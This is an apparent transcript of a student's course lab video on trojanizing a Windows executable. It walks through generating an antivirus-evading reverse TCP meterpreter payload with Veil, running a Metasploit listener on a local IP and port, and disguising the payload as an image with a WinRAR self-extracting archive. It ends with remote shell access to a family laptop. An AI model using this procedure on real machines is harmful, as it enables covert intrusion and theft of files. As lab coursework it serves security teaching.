This is James Crow, and this is lab 7.1 for cybersecurity 501. All right, the first thing I want to do is hide an image, pick an image to hide my executable in, and I went with the logo of a little website that I play around with just for fun. So I've already saved that, and I have already used the website in the tutorial to make a .ico image for a Windows icon. So I've already got that done. My next step is going to be to use Veil to create an executable that's supposed to be hidden from antivirus. So let's get started. So we want to veil.py -tool is going to be evasion. Alright, and then the payload that I want to use is C interpreter rev tcp.py. That's a reverse TCP shell. I'm going to use the IP of my laptop here, which is 10.0.0.99, and then I'm going to use port of 4321. All right. Oh, I got permission denied. I didn't use the super user, so let's try that again. Okay. You see it created my payload. And now what I have already done is I've created a zip file that has both my payload and the logo that I downloaded. And the next thing I want to do is I want to start up Metasploit Framework, copy those files to a USB, and then put the USB in my wife's Windows computer. So once we have Metasploit Framework up, we want to use exploit multi-handler, right? And then we want to set the payload Windows interpreter reverse TCP to capture the traffic from the little virus that Veil created. All right, we want to set lhost to my machine here. Oops. Set 10.0.0.99. All right, we want to set lport 4321. And exploit. Okay, so I'm listening. Now this this is going to get a little bit ugly because I'm going to have to actually hold my camera and point while I am working on the Windows computer. Okay, like I said, this is not going to be pretty, but I'm going to try to do this. Right click and open this with WinRAR. All right, then we're going to go to Tools, and we're going to create a Convert Archive to Self-Executable. Go to the Advanced Options, Setup, and we want to run the logo picture, score5.png. All right, score5. All right, and then we also want to run payload. If I can type payload.exe. All right, and then we'll make the icon, the little icon that I created, this little guy right here. All right, and then OK and OK. All right, and now we have with my new icon, this little file. We double click it. Unfortunately, I couldn't get the extracting interface to not show up, but once you hit install, and it's overriding because I've already run it once to test, and then it opens the picture. As you can see, it also opens up a interpreter shell. And you can see I'm looking at the files in my wife's laptop here. And that's it.